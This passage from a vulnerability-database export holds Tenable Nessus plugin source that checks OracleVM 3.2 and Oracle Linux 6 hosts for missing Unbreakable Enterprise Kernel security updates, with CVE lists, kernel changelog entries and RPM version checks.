Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0106.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100238);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-7446\", \"CVE-2015-1420\", \"CVE-2015-4700\", \"CVE-2015-5257\", \"CVE-2015-5707\", \"CVE-2015-6252\", \"CVE-2015-6937\", \"CVE-2015-9731\", \"CVE-2016-10088\", \"CVE-2016-10142\", \"CVE-2016-10229\", \"CVE-2016-2782\", \"CVE-2016-3140\", \"CVE-2016-3672\", \"CVE-2016-4482\", \"CVE-2016-4485\", \"CVE-2016-4580\", \"CVE-2016-7425\", \"CVE-2016-7910\", \"CVE-2016-8399\", \"CVE-2016-8633\", \"CVE-2016-8645\", \"CVE-2017-2583\", \"CVE-2017-2636\", \"CVE-2017-2647\", \"CVE-2017-5669\", \"CVE-2017-5986\", \"CVE-2017-6074\", \"CVE-2017-6214\", \"CVE-2017-6345\", \"CVE-2017-7184\", \"CVE-2017-7187\", \"CVE-2017-7895\");\n script_bugtraq_id(72357, 75356);\n\n script_name(english:\"OracleVM 3.2 : Unbreakable / etc (OVMSA-2017-0106)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - nfsd: stricter decoding of write-like NFSv2/v3 ops (J.\n Bruce Fields) [Orabug: 25986995] (CVE-2017-7895)\n\n - ocfs2/o2net: o2net_listen_data_ready should do nothing\n if socket state is not TCP_LISTEN (Tariq Saeed) [Orabug:\n 25510857]\n\n - IB/CORE: sync the resouce access in fmr_pool (Wengang\n Wang) [Orabug: 23750748]\n\n - ipv6: Skip XFRM lookup if dst_entry in socket cache is\n valid (Jakub Sitnicki) [Orabug: 25534688]\n\n - uek-rpm: enable CONFIG_KSPLICE. (Jamie Iles) [Orabug:\n 25549845]\n\n - ksplice: add sysctls for determining Ksplice features.\n (Jamie Iles) \n\n - signal: protect SIGNAL_UNKILLABLE from unintentional\n clearing. (Jamie Iles) [Orabug: 25549845]\n\n - KVM: x86: fix emulation of 'MOV SS, null selector'\n (Paolo Bonzini) [Orabug: 25719676] (CVE-2017-2583)\n (CVE-2017-2583)\n\n - sctp: avoid BUG_ON on sctp_wait_for_sndbuf (Marcelo\n Ricardo Leitner) [Orabug: 25719811] (CVE-2017-5986)\n\n - tcp: avoid infinite loop in tcp_splice_read (Eric\n Dumazet) [Orabug: 25720815] (CVE-2017-6214)\n\n - USB: visor: fix null-deref at probe (Johan Hovold)\n [Orabug: 25796604] (CVE-2016-2782)\n\n - ipc/shm: Fix shmat mmap nil-page protection (Davidlohr\n Bueso) [Orabug: 25797014] (CVE-2017-5669)\n\n - vhost: actually track log eventfd file\n (Marc-André Lureau) [Orabug: 25797056]\n (CVE-2015-6252)\n\n - xfrm_user: validate XFRM_MSG_NEWAE incoming ESN size\n harder (Andy Whitcroft) [Orabug: 25814664]\n (CVE-2017-7184)\n\n - xfrm_user: validate XFRM_MSG_NEWAE XFRMA_REPLAY_ESN_VAL\n replay_window (Andy Whitcroft) [Orabug: 25814664]\n (CVE-2017-7184)\n\n - KEYS: Remove key_type::match in favour of overriding\n default by match_preparse (David Howells) [Orabug:\n 25823965] (CVE-2017-2647) (CVE-2017-2647)\n\n - USB: whiteheat: fix potential null-deref at probe (Johan\n Hovold) [Orabug: 25825107] (CVE-2015-5257)\n\n - RDS: fix race condition when sending a message on\n unbound socket (Quentin Casasnovas) [Orabug: 25871048]\n (CVE-2015-6937) (CVE-2015-6937)\n\n - udf: Check path length when reading symlink (Jan Kara)\n [Orabug: 25871104] (CVE-2015-9731)\n\n - udf: Treat symlink component of type 2 as / (Jan Kara)\n [Orabug: 25871104] (CVE-2015-9731)\n\n - udp: properly support MSG_PEEK with truncated buffers\n (Eric Dumazet) [Orabug: 25874741] (CVE-2016-10229)\n\n - block: fix use-after-free in seq file (Vegard Nossum)\n [Orabug: 25877531] (CVE-2016-7910)\n\n - RHEL: complement upstream workaround for CVE-2016-10142.\n (Quentin Casasnovas) [Orabug: 25765786] (CVE-2016-10142)\n (CVE-2016-10142)\n\n - net: ping: check minimum size on ICMP header length\n (Kees Cook) [Orabug: 25766914] (CVE-2016-8399)\n\n - ipv6: stop sending PTB packets for MTU < 1280 (Hagen\n Paul Pfeifer) [Orabug: 25765786] (CVE-2016-10142)\n\n - sg_write/bsg_write is not fit to be called under\n KERNEL_DS (Al Viro) [Orabug: 25765448] (CVE-2016-10088)\n\n - scsi: sg: check length passed to SG_NEXT_CMD_LEN (peter\n chang) [Orabug: 25752011] (CVE-2017-7187)\n\n - tty: n_hdlc: get rid of racy n_hdlc.tbuf (Alexander\n Popov) [Orabug: 25696689] (CVE-2017-2636)\n\n - TTY: n_hdlc, fix lockdep false positive (Jiri Slaby)\n [Orabug: 25696689] (CVE-2017-2636)\n\n - drivers/tty/n_hdlc.c: replace kmalloc/memset by kzalloc\n (Fabian Frederick) [Orabug: 25696689] (CVE-2017-2636)\n\n - list: introduce list_first_entry_or_null (Jiri Pirko)\n [Orabug: 25696689] (CVE-2017-2636)\n\n - firewire: net: guard against rx buffer overflows (Stefan\n Richter) [Orabug: 25451538] (CVE-2016-8633)\n\n - x86/mm/32: Enable full randomization on i386 and X86_32\n (Hector Marco-Gisbert) [Orabug: 25463929]\n (CVE-2016-3672)\n\n - x86 get_unmapped_area: Access mmap_legacy_base through\n mm_struct member (Radu Caragea) [Orabug: 25463929]\n (CVE-2016-3672)\n\n - sg_start_req: make sure that there's not too many\n elements in iovec (Al Viro) [Orabug: 25490377]\n (CVE-2015-5707)\n\n - tcp: take care of truncations done by sk_filter (Eric\n Dumazet) [Orabug: 25507232] (CVE-2016-8645)\n\n - rose: limit sk_filter trim to payload (Willem de Bruijn)\n [Orabug: 25507232] (CVE-2016-8645)\n\n - scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer\n (Dan Carpenter) [Orabug: 25507330] (CVE-2016-7425)\n\n - x86: bpf_jit: fix compilation of large bpf programs\n (Alexei Starovoitov) [Orabug: 25507375] (CVE-2015-4700)\n\n - net: fix a kernel infoleak in x25 module (Kangjie Lu)\n [Orabug: 25512417] (CVE-2016-4580)\n\n - USB: digi_acceleport: do sanity checking for the number\n of ports (Oliver Neukum) [Orabug: 25512472]\n (CVE-2016-3140)\n\n - net/llc: avoid BUG_ON in skb_orphan (Eric Dumazet)\n [Orabug: 25682437] (CVE-2017-6345)\n\n - dccp: fix freeing skb too early for IPV6_RECVPKTINFO\n (Andrey Konovalov) [Orabug: 25598277] (CVE-2017-6074)\n\n - vfs: read file_handle only once in handle_to_path (Sasha\n Levin) [Orabug: 25388709] (CVE-2015-1420)\n\n - crypto: algif_hash - Only export and import on sockets\n with data (Herbert Xu) [Orabug: 25417807]\n\n - USB: usbfs: fix potential infoleak in devio (Kangjie Lu)\n [Orabug: 25462763] (CVE-2016-4482)\n\n - net: fix infoleak in llc (Kangjie Lu) [Orabug: 25462811]\n (CVE-2016-4485)\n\n - af_unix: Guard against other == sk in unix_dgram_sendmsg\n (Rainer Weikusat) [Orabug: 25464000] (CVE-2013-7446)\n\n - unix: avoid use-after-free in ep_remove_wait_queue\n (Rainer Weikusat) [Orabug: 25464000] (CVE-2013-7446)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2017-May/000728.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.2\", reference:\"kernel-uek-2.6.39-400.295.2.el5uek\")) flag++;\nif (rpm_check(release:\"OVS3.2\", reference:\"kernel-uek-firmware-2.6.39-400.295.2.el5uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:51:58", "description": "Description of changes:\n\n[2.6.39-400.295.2.el6uek]\n- nfsd: stricter decoding of write-like NFSv2/v3 ops (J. Bruce Fields) \n[Orabug: 25986995] {CVE-2017-7895}\n\n[2.6.39-400.295.1.el6uek]\n- ocfs2/o2net: o2net_listen_data_ready should do nothing if socket state \nis not TCP_LISTEN (Tariq Saeed) [Orabug: 25510857]\n- IB/CORE: sync the resouce access in fmr_pool (Wengang Wang) [Orabug: \n23750748]\n- ipv6: Skip XFRM lookup if dst_entry in socket cache is valid (Jakub \nSitnicki) [Orabug: 25534688]\n- uek-rpm: enable CONFIG_KSPLICE. (Jamie Iles) [Orabug: 25549845]\n- ksplice: add sysctls for determining Ksplice features. (Jamie Iles) \n[Orabug: 25549845]\n- signal: protect SIGNAL_UNKILLABLE from unintentional clearing. (Jamie \nIles) [Orabug: 25549845]\n- KVM: x86: fix emulation of 'MOV SS, null selector' (Paolo Bonzini) \n[Orabug: 25719676] {CVE-2017-2583} {CVE-2017-2583}\n- sctp: avoid BUG_ON on sctp_wait_for_sndbuf (Marcelo Ricardo Leitner) \n[Orabug: 25719811] {CVE-2017-5986}\n- tcp: avoid infinite loop in tcp_splice_read() (Eric Dumazet) [Orabug: \n25720815] {CVE-2017-6214}\n- USB: visor: fix null-deref at probe (Johan Hovold) [Orabug: 25796604] \n {CVE-2016-2782}\n- ipc/shm: Fix shmat mmap nil-page protection (Davidlohr Bueso) \n[Orabug: 25797014] {CVE-2017-5669}\n- vhost: actually track log eventfd file (Marc-André Lureau) [Orabug: \n25797056] {CVE-2015-6252}\n- xfrm_user: validate XFRM_MSG_NEWAE incoming ESN size harder (Andy \nWhitcroft) [Orabug: 25814664] {CVE-2017-7184}\n- xfrm_user: validate XFRM_MSG_NEWAE XFRMA_REPLAY_ESN_VAL replay_window \n(Andy Whitcroft) [Orabug: 25814664] {CVE-2017-7184}\n- KEYS: Remove key_type::match in favour of overriding default by \nmatch_preparse (David Howells) [Orabug: 25823965] {CVE-2017-2647} \n{CVE-2017-2647}\n- USB: whiteheat: fix potential null-deref at probe (Johan Hovold) \n[Orabug: 25825107] {CVE-2015-5257}\n- RDS: fix race condition when sending a message on unbound socket \n(Quentin Casasnovas) [Orabug: 25871048] {CVE-2015-6937} {CVE-2015-6937}\n- udf: Check path length when reading symlink (Jan Kara) [Orabug: \n25871104] {CVE-2015-9731}\n- udf: Treat symlink component of type 2 as / (Jan Kara) [Orabug: \n25871104] {CVE-2015-9731}\n- udp: properly support MSG_PEEK with truncated buffers (Eric Dumazet) \n[Orabug: 25874741] {CVE-2016-10229}\n- block: fix use-after-free in seq file (Vegard Nossum) [Orabug: \n25877531] {CVE-2016-7910}\n- RHEL: complement upstream workaround for CVE-2016-10142. (Quentin \nCasasnovas) [Orabug: 25765786] {CVE-2016-10142} {CVE-2016-10142}\n- net: ping: check minimum size on ICMP header length (Kees Cook) \n[Orabug: 25766914] {CVE-2016-8399}\n- ipv6: stop sending PTB packets for MTU < 1280 (Hagen Paul Pfeifer) \n[Orabug: 25765786] {CVE-2016-10142}\n- sg_write()/bsg_write() is not fit to be called under KERNEL_DS (Al \nViro) [Orabug: 25765448] {CVE-2016-10088}\n- scsi: sg: check length passed to SG_NEXT_CMD_LEN (peter chang) \n[Orabug: 25752011] {CVE-2017-7187}\n- tty: n_hdlc: get rid of racy n_hdlc.tbuf (Alexander Popov) [Orabug: \n25696689] {CVE-2017-2636}\n- TTY: n_hdlc, fix lockdep false positive (Jiri Slaby) [Orabug: \n25696689] {CVE-2017-2636}\n- drivers/tty/n_hdlc.c: replace kmalloc/memset by kzalloc (Fabian \nFrederick) [Orabug: 25696689] {CVE-2017-2636}\n- list: introduce list_first_entry_or_null (Jiri Pirko) [Orabug: \n25696689] {CVE-2017-2636}\n- firewire: net: guard against rx buffer overflows (Stefan Richter) \n[Orabug: 25451538] {CVE-2016-8633}\n- x86/mm/32: Enable full randomization on i386 and X86_32 (Hector \nMarco-Gisbert) [Orabug: 25463929] {CVE-2016-3672}\n- x86 get_unmapped_area: Access mmap_legacy_base through mm_struct \nmember (Radu Caragea) [Orabug: 25463929] {CVE-2016-3672}\n- sg_start_req(): make sure that there's not too many elements in iovec \n(Al Viro) [Orabug: 25490377] {CVE-2015-5707}\n- tcp: take care of truncations done by sk_filter() (Eric Dumazet) \n[Orabug: 25507232] {CVE-2016-8645}\n- rose: limit sk_filter trim to payload (Willem de Bruijn) [Orabug: \n25507232] {CVE-2016-8645}\n- scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer() (Dan \nCarpenter) [Orabug: 25507330] {CVE-2016-7425}\n- x86: bpf_jit: fix compilation of large bpf programs (Alexei \nStarovoitov) [Orabug: 25507375] {CVE-2015-4700}\n- net: fix a kernel infoleak in x25 module (Kangjie Lu) [Orabug: \n25512417] {CVE-2016-4580}\n- USB: digi_acceleport: do sanity checking for the number of ports \n(Oliver Neukum) [Orabug: 25512472] {CVE-2016-3140}\n- net/llc: avoid BUG_ON() in skb_orphan() (Eric Dumazet) [Orabug: \n25682437] {CVE-2017-6345}\n- dccp: fix freeing skb too early for IPV6_RECVPKTINFO (Andrey \nKonovalov) [Orabug: 25598277] {CVE-2017-6074}\n- vfs: read file_handle only once in handle_to_path (Sasha Levin) \n[Orabug: 25388709] {CVE-2015-1420}\n- crypto: algif_hash - Only export and import on sockets with data \n(Herbert Xu) [Orabug: 25417807]\n- USB: usbfs: fix potential infoleak in devio (Kangjie Lu) [Orabug: \n25462763] {CVE-2016-4482}\n- net: fix infoleak in llc (Kangjie Lu) [Orabug: 25462811] {CVE-2016-4485}\n- af_unix: Guard against other == sk in unix_dgram_sendmsg (Rainer \nWeikusat) [Orabug: 25464000] {CVE-2013-7446}\n- unix: avoid use-after-free in ep_remove_wait_queue (Rainer Weikusat) \n[Orabug: 25464000] {CVE-2013-7446}", "edition": 28, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-17T00:00:00", "title": "Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2017-3567)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2782", "CVE-2017-7895", "CVE-2017-7184", "CVE-2016-7910", "CVE-2016-8633", "CVE-2017-6074", "CVE-2016-8399", "CVE-2015-1420", "CVE-2016-10088", "CVE-2015-6252", "CVE-2015-9731", "CVE-2015-5257", "CVE-2017-2636", "CVE-2017-2583", "CVE-2016-7425", "CVE-2017-6214", "CVE-2016-4485", "CVE-2016-4482", "CVE-2017-6345", "CVE-2017-5669", "CVE-2017-2647", "CVE-2017-5986", "CVE-2016-3140", "CVE-2016-10229", "CVE-2013-7446", "CVE-2017-7187", "CVE-2016-10142", "CVE-2015-5707", "CVE-2016-4580", "CVE-2016-3672", "CVE-2016-8645", "CVE-2015-6937", "CVE-2015-4700"], "modified": "2017-05-17T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2017-3567.NASL", "href": "https://www.tenable.com/plugins/nessus/100235", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2017-3567.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100235);\n script_version(\"3.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-7446\", \"CVE-2015-1420\", \"CVE-2015-4700\", \"CVE-2015-5257\", \"CVE-2015-5707\", \"CVE-2015-6252\", \"CVE-2015-6937\", \"CVE-2015-9731\", \"CVE-2016-10088\", \"CVE-2016-10142\", \"CVE-2016-10229\", \"CVE-2016-2782\", \"CVE-2016-3140\", \"CVE-2016-3672\", \"CVE-2016-4482\", \"CVE-2016-4485\", \"CVE-2016-4580\", \"CVE-2016-7425\", \"CVE-2016-7910\", \"CVE-2016-8399\", \"CVE-2016-8633\", \"CVE-2016-8645\", \"CVE-2017-2583\", \"CVE-2017-2636\", \"CVE-2017-2647\", \"CVE-2017-5669\", \"CVE-2017-5986\", \"CVE-2017-6074\", \"CVE-2017-6214\", \"CVE-2017-6345\", \"CVE-2017-7184\", \"CVE-2017-7187\", \"CVE-2017-7895\");\n\n script_name(english:\"Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2017-3567)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Description of changes:\n\n[2.6.39-400.295.2.el6uek]\n- nfsd: stricter decoding of write-like NFSv2/v3 ops (J. Bruce Fields) \n[Orabug: 25986995] {CVE-2017-7895}\n\n[2.6.39-400.295.1.el6uek]\n- ocfs2/o2net: o2net_listen_data_ready should do nothing if socket state \nis not TCP_LISTEN (Tariq Saeed) [Orabug: 25510857]\n- IB/CORE: sync the resouce access in fmr_pool (Wengang Wang) [Orabug: \n23750748]\n- ipv6: Skip XFRM lookup if dst_entry in socket cache is valid (Jakub \nSitnicki) [Orabug: 25534688]\n- uek-rpm: enable CONFIG_KSPLICE. (Jamie Iles) [Orabug: 25549845]\n- ksplice: add sysctls for determining Ksplice features. (Jamie Iles) \n[Orabug: 25549845]\n- signal: protect SIGNAL_UNKILLABLE from unintentional clearing. (Jamie \nIles) [Orabug: 25549845]\n- KVM: x86: fix emulation of 'MOV SS, null selector' (Paolo Bonzini) \n[Orabug: 25719676] {CVE-2017-2583} {CVE-2017-2583}\n- sctp: avoid BUG_ON on sctp_wait_for_sndbuf (Marcelo Ricardo Leitner) \n[Orabug: 25719811] {CVE-2017-5986}\n- tcp: avoid infinite loop in tcp_splice_read() (Eric Dumazet) [Orabug: \n25720815] {CVE-2017-6214}\n- USB: visor: fix null-deref at probe (Johan Hovold) [Orabug: 25796604] \n {CVE-2016-2782}\n- ipc/shm: Fix shmat mmap nil-page protection (Davidlohr Bueso) \n[Orabug: 25797014] {CVE-2017-5669}\n- vhost: actually track log eventfd file (Marc-André Lureau) [Orabug: \n25797056] {CVE-2015-6252}\n- xfrm_user: validate XFRM_MSG_NEWAE incoming ESN size harder (Andy \nWhitcroft) [Orabug: 25814664] {CVE-2017-7184}\n- xfrm_user: validate XFRM_MSG_NEWAE XFRMA_REPLAY_ESN_VAL replay_window \n(Andy Whitcroft) [Orabug: 25814664] {CVE-2017-7184}\n- KEYS: Remove key_type::match in favour of overriding default by \nmatch_preparse (David Howells) [Orabug: 25823965] {CVE-2017-2647} \n{CVE-2017-2647}\n- USB: whiteheat: fix potential null-deref at probe (Johan Hovold) \n[Orabug: 25825107] {CVE-2015-5257}\n- RDS: fix race condition when sending a message on unbound socket \n(Quentin Casasnovas) [Orabug: 25871048] {CVE-2015-6937} {CVE-2015-6937}\n- udf: Check path length when reading symlink (Jan Kara) [Orabug: \n25871104] {CVE-2015-9731}\n- udf: Treat symlink component of type 2 as / (Jan Kara) [Orabug: \n25871104] {CVE-2015-9731}\n- udp: properly support MSG_PEEK with truncated buffers (Eric Dumazet) \n[Orabug: 25874741] {CVE-2016-10229}\n- block: fix use-after-free in seq file (Vegard Nossum) [Orabug: \n25877531] {CVE-2016-7910}\n- RHEL: complement upstream workaround for CVE-2016-10142. (Quentin \nCasasnovas) [Orabug: 25765786] {CVE-2016-10142} {CVE-2016-10142}\n- net: ping: check minimum size on ICMP header length (Kees Cook) \n[Orabug: 25766914] {CVE-2016-8399}\n- ipv6: stop sending PTB packets for MTU < 1280 (Hagen Paul Pfeifer) \n[Orabug: 25765786] {CVE-2016-10142}\n- sg_write()/bsg_write() is not fit to be called under KERNEL_DS (Al \nViro) [Orabug: 25765448] {CVE-2016-10088}\n- scsi: sg: check length passed to SG_NEXT_CMD_LEN (peter chang) \n[Orabug: 25752011] {CVE-2017-7187}\n- tty: n_hdlc: get rid of racy n_hdlc.tbuf (Alexander Popov) [Orabug: \n25696689] {CVE-2017-2636}\n- TTY: n_hdlc, fix lockdep false positive (Jiri Slaby) [Orabug: \n25696689] {CVE-2017-2636}\n- drivers/tty/n_hdlc.c: replace kmalloc/memset by kzalloc (Fabian \nFrederick) [Orabug: 25696689] {CVE-2017-2636}\n- list: introduce list_first_entry_or_null (Jiri Pirko) [Orabug: \n25696689] {CVE-2017-2636}\n- firewire: net: guard against rx buffer overflows (Stefan Richter) \n[Orabug: 25451538] {CVE-2016-8633}\n- x86/mm/32: Enable full randomization on i386 and X86_32 (Hector \nMarco-Gisbert) [Orabug: 25463929] {CVE-2016-3672}\n- x86 get_unmapped_area: Access mmap_legacy_base through mm_struct \nmember (Radu Caragea) [Orabug: 25463929] {CVE-2016-3672}\n- sg_start_req(): make sure that there's not too many elements in iovec \n(Al Viro) [Orabug: 25490377] {CVE-2015-5707}\n- tcp: take care of truncations done by sk_filter() (Eric Dumazet) \n[Orabug: 25507232] {CVE-2016-8645}\n- rose: limit sk_filter trim to payload (Willem de Bruijn) [Orabug: \n25507232] {CVE-2016-8645}\n- scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer() (Dan \nCarpenter) [Orabug: 25507330] {CVE-2016-7425}\n- x86: bpf_jit: fix compilation of large bpf programs (Alexei \nStarovoitov) [Orabug: 25507375] {CVE-2015-4700}\n- net: fix a kernel infoleak in x25 module (Kangjie Lu) [Orabug: \n25512417] {CVE-2016-4580}\n- USB: digi_acceleport: do sanity checking for the number of ports \n(Oliver Neukum) [Orabug: 25512472] {CVE-2016-3140}\n- net/llc: avoid BUG_ON() in skb_orphan() (Eric Dumazet) [Orabug: \n25682437] {CVE-2017-6345}\n- dccp: fix freeing skb too early for IPV6_RECVPKTINFO (Andrey \nKonovalov) [Orabug: 25598277] {CVE-2017-6074}\n- vfs: read file_handle only once in handle_to_path (Sasha Levin) \n[Orabug: 25388709] {CVE-2015-1420}\n- crypto: algif_hash - Only export and import on sockets with data \n(Herbert Xu) [Orabug: 25417807]\n- USB: usbfs: fix potential infoleak in devio (Kangjie Lu) [Orabug: \n25462763] {CVE-2016-4482}\n- net: fix infoleak in llc (Kangjie Lu) [Orabug: 25462811] {CVE-2016-4485}\n- af_unix: Guard against other == sk in unix_dgram_sendmsg (Rainer \nWeikusat) [Orabug: 25464000] {CVE-2013-7446}\n- unix: avoid use-after-free in ep_remove_wait_queue (Rainer Weikusat) \n[Orabug: 25464000] {CVE-2013-7446}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-May/006913.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = 